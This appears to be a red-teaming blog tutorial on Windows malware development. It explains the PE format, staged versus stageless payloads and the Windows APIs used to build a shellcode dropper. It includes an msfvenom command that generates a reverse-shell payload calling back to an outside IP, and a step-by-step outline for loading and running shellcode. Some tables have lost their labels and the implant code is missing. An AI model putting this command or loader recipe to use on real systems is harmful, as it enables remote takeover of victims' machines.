Table of Contents
- Welcome to another red teaming blog post where we dive into malware development and how we can write malware using C/C++.
- We will go over some fundamentals such as the PE file structure, Windows APIs then finally see how we can put together a dropper that executes shellcode for us on a target system
- Windows 10 box
- Any IDE
- Basic programming knowledge
- In my red teaming journey, the emphasis on writing custom toolset always plays a big role in understanding the current threat landscape, emulating what adversaries are doing and I guess… it’s just fun!
The PE file structure #
portable executablealso called the Windows executable file format is a data structure that in Windows that holds information necessary for the execution of files.
It is used to
organize executable files, object files, DLLs, FON Font filesin 32-bit and 64-bit versions of Windows operating systems.
Understanding the organization of file components in a PE is very important when it comes to the
design and analysisof malware.
In the analysis and development of malware, it is important to be familiar with the PE file structure to understand how malware works on a basic level, what it does from a behavioral analysis point of view, such as how it interacts with the operating system, antivirus or EDR in place and how it communicates externally. etc
In its simplest form, the PE file format is organized as follows:
- It takes up the first 64 bytes and holds various metadata about the executable file.
- Its components include:
|This section identifies an MS-DOS compatible file type using the “MZ” initials.
|This is what prints out “This program cannot be run in DOS mode” when executed in DOS.
PE File Header
|Contains the signature that identifies the executable as a PE.
Image Optional Header
|Holds optional information about a PE, such as the base address of the image in memory, sizes of the code/data sections, the entry point relative virtual address, etc.
|Describes attributes of sections in the PE, such as name, size, virtual address, and attributes (readable, writable, executable).
- These are the components that make up the PE sections:
|Contains executable code.
|Holds initialized data.
|Stores uninitialized data.
|Stores non-executable resources.
|Lists imported functions and libraries.
|Lists exported functions and symbols.
|Contains exception handling information.
|Holds debugging-related data.
Staged vs Stageless #
- Both of these are different approaches used in the delivery of malware
standalone self-contained malwarethat does not rely on external resources to complete execution.
Staged malwarefollows a different approach. It contains
multiple processes, usually two or more phases where the first, commonly referred to as the
stager, is a small piece of code responsible for establishing a C2 connection with the infrastructure. Its main functionality is to
load the subsequent stage of the malware.
- A common example is the metasploit framework where stageless payloads have the following notation: meterpreter_:
- While the staged have the following notation: meterpreter/:
- Both have their cons and pros where we see staged payloads being more evasive and capable of bypassing AVs due to execution of malware in separate stages. Stageless is good when maintaining simplicity but can be bulky to deliver. We will look into both ways of developing this malware.
Processes, Threads, Handles #
- A process is a program in execution. It can be made of different multiple threads executing instructions at the same time.
- A thread is the smallest unit of execution within a process. Processes can have multiple threads that share the process’s resources.
- A handle is an identifier used to access a resource (files, threads, memory). When a process needs to access resources, the OS will provide a handle that the process will use to access said resources.
- Shellcode is a
set of instructionsthat is meant to be executed directly by a target system. Once it’s executed, it could provide a callback
connection to the attacker or execute arbitrary commandson the target.
- It is typically written in
assembly, designed to be super-efficient while leveraging various system calls or APIs to achieve the intended goal
- We can quickly generate shellcode using
➜ ~ msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.100.72 LPORT=443 EXITFUNC=thread -f C
Windows APIs #
- Windows APIs play a key role in malware development as they create a standardized interface for the malware
to interact with the Operating System.
Windows APIis a collection of functions, data structures, and constants provided by the Windows OS.
- It allows developers to create applications that can interact with the underlying resources.
- The APIs are well documented here and we will be using it as a reference
MessageBox API #
We will write our first program that uses a Windows API (MessageBox) to display some text. The implementation of the API is well documented as shown:
In your IDE, we can import the relevant libraries and implement the API as shown in the docs
High-level Overview #
- At a high level, the dropper’s implementation to execute shellcode is as follows:
- Embed the shellcode to the dropper by using a byte array of the raw hex of the shellcode.
- Allocate memory on a process for the shellcode to be copied into
- Copy the shellcode into the allocated memory
- Execute the shellcode
- Let’s move on to the APIs necessary to implement for our dropper.
- This API is used in reserving regions of memory within the virtual address space of a process.
- We will use this to allocate the necessary space for storing the shellcode.
- This memory manipulation function is used to copy a block of memory from one location to another.
- We will use this to copy the shellcode into the memory allocated by VirtualAlloc
VirtualProtectfunction changes the protection settings of a region of virtual memory. We will use it to modify permissions of the memory block we copied our shellcode to, in this case, we add executable and read permissions to be able to execute our shellcode
- We use this to create a thread that is executed within the address space of another process. This is what runs our shellcode.
- It is used to wait until the specified object is in a certain state or until a timeout interval elapses. We use this to have our shellcode running infinitely till a failure is encountered
The Stageless implant #
- Putting together the above APIs, we have the following C++ stageless implant that executes shellcode for us.
- You can build upon the above code by making it staged, such that it pulls shellcode from a remote source, loads it into a byte array then proceeds with the execution routine.